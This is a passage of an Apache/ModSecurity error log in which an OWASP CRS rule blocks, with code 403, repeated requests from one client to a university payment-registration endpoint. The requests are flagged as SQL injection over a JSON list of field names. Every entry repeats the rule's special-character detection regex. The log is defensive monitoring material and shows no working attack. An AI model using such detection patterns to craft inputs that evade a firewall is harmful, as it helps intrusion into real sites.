[\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfioAAAAj"]
[Tue Aug 29 09:40:27.060667 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfisAAAAj"]
[Tue Aug 29 09:40:27.246883 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfiwAAAAj"]
[Tue Aug 29 09:40:27.431507 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi0AAAAj"]
[Tue Aug 29 09:40:27.615460 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi4AAAAj"]
[Tue Aug 29 09:40:27.800699 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi8AAAAj"]
[Tue Aug 29 09:40:27.975447 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfjAAAAAj"]
[Tue Aug 29 09:40:28.150994 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjEAAAAj"]
[Tue Aug 29 09:40:28.316669 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjIAAAAj"]
[Tue Aug 29 09:40:28.486560 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjMAAAAj"]
[Tue Aug 29 09:40:28.664372 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjQAAAAj"]
[Tue Aug 29 09:40:28.871180 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjUAAAAj"]
[Tue Aug 29 09:40:29.063507 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjYAAAAj"]
[Tue Aug 29 09:40:29.447162 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjcAAAAj"]
[Tue Aug 29 09:40:29.624225 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjgAAAAj"]
[Tue Aug 29 09:40:29.792149 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjkAAAAj"]
[Tue Aug 29 09:40:29.975321 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjoAAAAj"]
[Tue Aug 29 09:40:30.224283 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfjsAAAAj"]
[Tue Aug 29 09:40:30.415554 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfjwAAAAj"]
[Tue Aug 29 09:40:30.583233 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfj0AAAAj"]
